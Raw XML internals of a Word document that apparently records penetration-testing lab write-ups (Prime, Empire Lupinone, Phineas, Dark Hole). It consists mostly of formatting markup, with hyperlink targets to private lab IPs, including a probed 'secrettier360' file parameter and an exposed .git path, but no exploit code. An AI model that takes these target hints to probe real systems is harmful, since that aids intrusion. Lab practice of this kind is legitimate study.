    <w:rsid w:val="005F613A"/>
    <w:rsid w:val="005F73A5"/>
    <w:rsid w:val="00603C59"/>
    <w:rsid w:val="0061530E"/>
    <w:rsid w:val="0061710C"/>
    <w:rsid w:val="0061732C"/>
    <w:rsid w:val="0062444F"/>
    <w:rsid w:val="00632431"/>
    <w:rsid w:val="00637783"/>
    <w:rsid w:val="0064000E"/>
    <w:rsid w:val="00644F37"/>
    <w:rsid w:val="0065115E"/>
    <w:rsid w:val="00651D9D"/>
    <w:rsid w:val="0067765F"/>
    <w:rsid w:val="0069241E"/>
    <w:rsid w:val="00693877"/>
    <w:rsid w:val="006A33A4"/>
    <w:rsid w:val="006A4280"/>
    <w:rsid w:val="006C60E5"/>
    <w:rsid w:val="006D0F7A"/>
    <w:rsid w:val="006D6218"/>
    <w:rsid w:val="00702533"/>
    <w:rsid w:val="007077BB"/>
    <w:rsid w:val="00707E39"/>
    <w:rsid w:val="00707F8B"/>
    <w:rsid w:val="007135EC"/>
    <w:rsid w:val="007144FF"/>
    <w:rsid w:val="007150F9"/>
    <w:rsid w:val="0073032F"/>
    <w:rsid w:val="00731C98"/>
    <w:rsid w:val="007348AA"/>
    <w:rsid w:val="00750585"/>
    <w:rsid w:val="00761000"/>
    <w:rsid w:val="00762B55"/>
    <w:rsid w:val="00767A77"/>
    <w:rsid w:val="00773317"/>
    <w:rsid w:val="00774C99"/>
    <w:rsid w:val="007A12EC"/>
    <w:rsid w:val="007A1355"/>
    <w:rsid w:val="007A2B03"/>
    <w:rsid w:val="007A6CEC"/>
    <w:rsid w:val="007B4081"/>
    <w:rsid w:val="007B6A94"/>
    <w:rsid w:val="007C033A"/>
    <w:rsid w:val="007C4BE2"/>
    <w:rsid w:val="007D6A52"/>
    <w:rsid w:val="007E4EDC"/>
    <w:rsid w:val="007F5A76"/>
    <w:rsid w:val="00802AD9"/>
    <w:rsid w:val="00816CBE"/>
    <w:rsid w:val="00826053"/>
    <w:rsid w:val="00830748"/>
    <w:rsid w:val="0083731E"/>
    <w:rsid w:val="00837EB7"/>
    <w:rsid w:val="00847715"/>
    <w:rsid w:val="00850970"/>
    <w:rsid w:val="00853582"/>
    <w:rsid w:val="00877D31"/>
    <w:rsid w:val="008B5A92"/>
    <w:rsid w:val="008C3D64"/>
    <w:rsid w:val="008D6BEC"/>
    <w:rsid w:val="008E487F"/>
    <w:rsid w:val="008E6A2C"/>
    <w:rsid w:val="008F4396"/>
    <w:rsid w:val="00905A41"/>
    <w:rsid w:val="00906AF2"/>
    <w:rsid w:val="009146B7"/>
    <w:rsid w:val="00945677"/>
    <w:rsid w:val="00947D83"/>
    <w:rsid w:val="00952E46"/>
    <w:rsid w:val="0095391D"/>
    <w:rsid w:val="00964103"/>
    <w:rsid w:val="009642B7"/>
    <w:rsid w:val="00964D03"/>
    <w:rsid w:val="00966A84"/>
    <w:rsid w:val="00993AFC"/>
    <w:rsid w:val="009B372D"/>
    <w:rsid w:val="009B56DD"/>
    <w:rsid w:val="009C7344"/>
    <w:rsid w:val="009D62C8"/>
    <w:rsid w:val="009E0729"/>
    <w:rsid w:val="009E1489"/>
    <w:rsid w:val="009F0FE7"/>
    <w:rsid w:val="00A12D29"/>
    <w:rsid w:val="00A139B4"/>
    <w:rsid w:val="00A17828"/>
    <w:rsid w:val="00A3498C"/>
    <w:rsid w:val="00A400E2"/>
    <w:rsid w:val="00A52375"/>
    <w:rsid w:val="00A54A10"/>
    <w:rsid w:val="00A72563"/>
    <w:rsid w:val="00A84331"/>
    <w:rsid w:val="00A8598A"/>
    <w:rsid w:val="00A9429C"/>
    <w:rsid w:val="00A97222"/>
    <w:rsid w:val="00AA0425"/>
    <w:rsid w:val="00AA765A"/>
    <w:rsid w:val="00AB5820"/>
    <w:rsid w:val="00AB7B3B"/>
    <w:rsid w:val="00AC6A02"/>
    <w:rsid w:val="00AE1E70"/>
    <w:rsid w:val="00B13418"/>
    <w:rsid w:val="00B258B0"/>
    <w:rsid w:val="00B261AD"/>
    <w:rsid w:val="00B32F54"/>
    <w:rsid w:val="00B3516F"/>
    <w:rsid w:val="00B467F3"/>
    <w:rsid w:val="00B50532"/>
    <w:rsid w:val="00B615B5"/>
    <w:rsid w:val="00B63DE5"/>
    <w:rsid w:val="00B65A1C"/>
    <w:rsid w:val="00B671E5"/>
    <w:rsid w:val="00B90E12"/>
    <w:rsid w:val="00B93D29"/>
    <w:rsid w:val="00BA5B78"/>
    <w:rsid w:val="00BB5E8C"/>
    <w:rsid w:val="00BB6B72"/>
    <w:rsid w:val="00BC780F"/>
    <w:rsid w:val="00BD3BFF"/>
    <w:rsid w:val="00BF08DE"/>
    <w:rsid w:val="00C15533"/>
    <w:rsid w:val="00C34F11"/>
    <w:rsid w:val="00C362D0"/>
    <w:rsid w:val="00C476D5"/>
    <w:rsid w:val="00C53159"/>
    <w:rsid w:val="00C67E9D"/>
    <w:rsid w:val="00C71D75"/>
    <w:rsid w:val="00C7345A"/>
    <w:rsid w:val="00C8149C"/>
    <w:rsid w:val="00C847A8"/>
    <w:rsid w:val="00C91FE6"/>
    <w:rsid w:val="00C973A3"/>
    <w:rsid w:val="00CA639A"/>
    <w:rsid w:val="00CB59B4"/>
    <w:rsid w:val="00CC767F"/>
    <w:rsid w:val="00CD7191"/>
    <w:rsid w:val="00CF0AC2"/>
    <w:rsid w:val="00CF1087"/>
    <w:rsid w:val="00CF404D"/>
    <w:rsid w:val="00D023DC"/>
    <w:rsid w:val="00D03CDC"/>
    <w:rsid w:val="00D10C19"/>
    <w:rsid w:val="00D209AF"/>
    <w:rsid w:val="00D215F8"/>
    <w:rsid w:val="00D33C81"/>
    <w:rsid w:val="00D37658"/>
    <w:rsid w:val="00D44F7C"/>
    <w:rsid w:val="00D51377"/>
    <w:rsid w:val="00D522A7"/>
    <w:rsid w:val="00D771DF"/>
    <w:rsid w:val="00D77D20"/>
    <w:rsid w:val="00D9150E"/>
    <w:rsid w:val="00D96767"/>
    <w:rsid w:val="00DA21FD"/>
    <w:rsid w:val="00DA54FE"/>
    <w:rsid w:val="00DA7DE8"/>
    <w:rsid w:val="00DB1C7B"/>
    <w:rsid w:val="00DB5FF8"/>
    <w:rsid w:val="00DB71A8"/>
    <w:rsid w:val="00DC1B20"/>
    <w:rsid w:val="00DC770E"/>
    <w:rsid w:val="00DD08E5"/>
    <w:rsid w:val="00DE0FD8"/>
    <w:rsid w:val="00DF02FF"/>
    <w:rsid w:val="00E0050E"/>
    <w:rsid w:val="00E34903"/>
    <w:rsid w:val="00E46565"/>
    <w:rsid w:val="00E606E1"/>
    <w:rsid w:val="00E6117A"/>
    <w:rsid w:val="00E63F8F"/>
    <w:rsid w:val="00E7177E"/>
    <w:rsid w:val="00E752CA"/>
    <w:rsid w:val="00E77907"/>
    <w:rsid w:val="00E9453B"/>
    <w:rsid w:val="00EA24B7"/>
    <w:rsid w:val="00EA2F22"/>
    <w:rsid w:val="00EB1656"/>
    <w:rsid w:val="00EB43DE"/>
    <w:rsid w:val="00EB561B"/>
    <w:rsid w:val="00EC23DE"/>
    <w:rsid w:val="00ED53B0"/>
    <w:rsid w:val="00EE281B"/>
    <w:rsid w:val="00EE5F5E"/>
    <w:rsid w:val="00EF311F"/>
    <w:rsid w:val="00F466A1"/>
    <w:rsid w:val="00F54FC2"/>
    <w:rsid w:val="00F56443"/>
    <w:rsid w:val="00F62C24"/>
    <w:rsid w:val="00F726D5"/>
    <w:rsid w:val="00FA5512"/>
    <w:rsid w:val="00FC4C16"/>
    <w:rsid w:val="00FF4A4E"/>
    <w:rsid w:val="00FF68A6"/>
    <w:rsid w:val="00FF6CBF"/>
    <w:rsid w:val="00FF73A7"/>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E524"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B2040F6A-64C9-44EC-9A3C-88C076FB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0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2EC"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000512EC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A139B4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007B408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137809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="760873581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="773942994">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="828906319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="884297438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="95494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192.168.56.143/image.php?secrettier360=dev" TargetMode="External"/><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hyperlink" Target="http://192.168.56.141/structure/"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28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jehad@192.168.56.145"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hyperlink" Target="https://gist.github.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2" TargetMode="External"/><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192.168.56.143/dev" TargetMode="External"/><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9.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.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hyperlink" Target="http://192.168.56.145/.git/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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3.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192.168.56.143/image.php?secrettier360=index.php" TargetMode="External"/><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yperlink" Target="http://192.168.56.141"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192.168.56.143/image.php?secrettier360=" TargetMode="External"/><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hyperlink" Target="http://192.168.56.143/index.php" TargetMode="External"/><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E950-1839-4BD9-884D-77F50673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1</Pages>
  <Words>3314</Words>
  <Characters>18895</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ab: Phineas</vt:lpstr>
      <vt:lpstr>Lab: Empire_Lupinone</vt:lpstr>
      <vt:lpstr>Lab: Prime</vt:lpstr>
      <vt:lpstr>Lab: Dark Hole 1</vt:lpstr>
      <vt:lpstr>Lab: Dark Hole 2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <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Vũ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Phúc Vũ</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <cp:lastPrinted>2023-03-16T15:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-08T15:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-16T15:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>